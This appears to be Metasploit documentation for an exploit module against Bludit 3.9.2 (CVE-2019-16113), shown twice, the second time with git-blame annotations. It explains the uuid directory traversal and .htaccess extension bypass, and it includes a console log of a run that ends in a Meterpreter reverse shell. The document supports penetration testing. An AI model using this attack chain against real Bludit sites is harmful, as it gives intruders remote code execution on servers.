documentation/modules/exploit/linux/http/bludit_upload_images_exec.md

# Bludit Directory Traversal Image File Upload Vulnerability

## Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could abuse the `uuid` parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.

## Setup

1. Set up a Ubuntu box with Apache, PHP, and MySQL.
2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.

## Scenarios

```
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
```
Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit 2019-11-05 08:57:15 -06:00			`# Bludit Directory Traversal Image File Upload Vulnerability`

			`## Description`

Fix typos and format 2019-11-11 14:47:56 -06:00			This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could abuse the `uuid` parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.
Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit 2019-11-05 08:57:15 -06:00
			`## Setup`

			`1. Set up a Ubuntu box with Apache, PHP, and MySQL.`
			`2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip`
			3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.

Fix typos and format 2019-11-11 14:47:56 -06:00			`## Scenarios`
Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit 2019-11-05 08:57:15 -06:00
			```
			`msf5 exploit(linux/http/bludit_upload_images_exec) > check`
			`[*] 172.16.135.162:80 - The service is running, but could not be validated.`
			`msf5 exploit(linux/http/bludit_upload_images_exec) > run`

			`[*] Started reverse TCP handler on 172.16.135.1:4444`
			`[+] Logged in as: admin`
			`[*] Retrieving UUID...`
			`[*] Uploading qGkVsmahdK.png...`
			`[*] Uploading .htaccess...`
			`[*] Executing qGkVsmahdK.png...`
			`[*] Sending stage (38288 bytes) to 172.16.135.162`
			`[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600`
			`[+] Deleted .htaccess`
			```